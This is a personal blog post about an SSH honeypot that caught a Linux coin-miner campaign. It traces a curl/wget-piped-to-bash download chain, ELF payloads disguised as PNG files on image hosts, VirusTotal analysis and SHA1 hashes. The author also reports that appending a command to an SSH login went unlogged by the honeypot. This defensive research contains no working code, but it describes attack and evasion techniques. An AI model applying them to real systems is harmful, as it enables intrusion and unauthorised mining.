That Time I Accidentally Burned A Malware Campaign

It's been ages since I've written here and part of that has been down to being just busy with life, projects and college work but a large amount of that has been down to the completely garbage editor that Ghost now uses that isn't based in Markdown and turned a fantastic experience into one I despise because of how utterly frustrating it is to have written for years in Markdown and to have it taken away from me... But that's neither here nor there and what is important is that I've been busy working on some idea's and it's time to share a small part of what I have been working on!

I've been playing with Honeypots/nets for the best part of three months to see what kind of data I could usefully get out of them and to be honest, the vast, vast majority of what I've seen has either not been so interesting because its a low effort, low cost, opportunistic attacks and of the few that have stood out, upon digging deeper, they turn out to be much ado about nothing. The largest attacks I've seen have been just spammed out across the internet and have been noticed by many large and small security companies and been analyzed to death, like the 5,201 samples of WannaCry I picked up of which the only discernible difference is that they have a different crypto wallet address to deposit your ransom in or they have a different packer version.

Thinking I spent an age working on something, only to have nothing again, I took a chance and looked at something I wouldn't normally look at. What people were trying to do over SSH to my poor honeypot. And ohh boy did I find something interesting!

Now it's not particularly weird to see an attack look for who user they are or system information as they are useful to know your next steps. But it's weird to see someone curl OR wget a script and pipe that to bash while sending all feedback to /dev/null and not just that, running it in the background! This was kind of irresistible and I kinda spend nearly every waking hour if not thinking about this, but working on it and verifying that I was right and that I wasn't crazy

Above is a snippet of the text that the command try's to execute and essentially, if a number of conditions are met it will reach out to to a number of image hosting sites and pull down an x32 or x64 "png" file and failing that it also reaches out to another site and pulls down a second script

This second script goes to two more "png" files and failing that, it just cuts and runs to a malware distribution point to download the x32 or x64 versions.

If you try and look a the images, you get warnings such as above from image hosting sites that say that the image cannot be displayed because it contains error, which would be unusual for an image... If you download the image though and open it with a text editor, you get an ELF header which is not the expected behavior for an image.

Using sha1sum I got the hash and uploaded it to Virus Total and I'm not sure if it was me who found it or not, but if it wasn't me, I was dam close to finding it! Using the Relations tab I was able to get domains associated with malware and map things out. The associated domains are the same domain three times though which isn't of much use but looking at the domain in VT Graph did allow me to see that it is related to other variants of Linux Coin Miners:

Also using VT Graph I was able to map out a mental picture for me of how the attack worked in an end to end fashion. I know that's not for VT Graph is necessarily for, but if you ever have to present your work in an easy to understand way for less digitally literate people or if you want great pictures for professionals to describe attacks, VT Graph is perfect!

So if I can detect the command they are executing, can I see how they are logging in? Splunk Can give me useful information, but as useful as it is, there's a slight problem:

If I get the IP's that the attackers are using and search for the usernames and passwords used, I get zero results:

Now I have two theories as to why this is. The first and most likley is that my Splunk command is wrong and I need a logical operator before the first src command. The second is that there is a small gap in Cowrie's abailty to log. I'm not exactly sure where this gap exists though. My working hypothesis is that since one of the connections issuing the commands is using the SSH-2.0-Go client, that either Go is doing sometime unusual or the attacker is doing something unusual and the only unusal thing I could think of was directly appending a command to the SSH login. So I tried that:

And I was able to successfully able to execute this in bash and have everything run as inteneded in the background while trying to get it to execute as root but its never that simple is it...

Cowrie didn't detect any of it, at all... Which leaves me with more questions about how than answers. I was hoping to dig deeper into the why this is the case, but while preparing a presentation on this research, I noticed that I forgot to save a copy of the pygo script and ohh boy am I glad I didn't becuase the attackers cleary weren'y happy that myself and some other individuals had dumped their work into Virus Total and had updated their pygo script t0 be a serioes of  char variables that are coupled to make the script when executed.

And of course i had to go and burn this too because you just can't not leave them like that. And I left links to Virus Total along with hashes, a list of all the domains and also the details on the C2 servers and anywhere I used a VT Graph I made, I left a link to the graph in the caption too. Happy digging if you want to!

Going forward, I've been thinking a lot more about honeypots for specific, targeted information such as EternalPot by Kevin Beaumont though tailored to something else more interesting to me personally and using something that has a much better capability than I can see Splunk has for packet captures such as QRadar or The Hive and playing back what attackers do like in Azure Sentinel or having a better capability for Malware Analysis or having better ways to automatically send data to Virus Total, Malice or MISP to get reports back or help do a deeper analysis that I currently can with the limited time and resources I have. Or maybe just a further dive into either automating the Malware Analysis or doing some datamining to make further work on this less time intensive for me since it did consume 5 full days I really couldn't afford to give to it... Failing that, I've also been reading a lot about how to fool Computer Vision systems can be fooled or how you can defeat facial recognition systems using commodity hardware.

So I guess I've ton's of idea's to work away on, I just need to find the time

SHA1 Hashes:
a64/b64/c64/urlx64/urlx642 Malware dec3575c3630d0c16841b559875bc5d572459691
a32/b32/c32/urlx32/urlx322 Malware 132f8a76587f7c1d2a424be948b01ac704b820e9
pygo script 1dd32cb1bcf7f871d9eca24c2c60860153f189b6
pygo char() script 253f9302de8b353c0d08d64edebcbe2cc00e3a56

Suspected C2 Servers or Coin Mining Pools:


Paddy Kerley

Paddy Kerley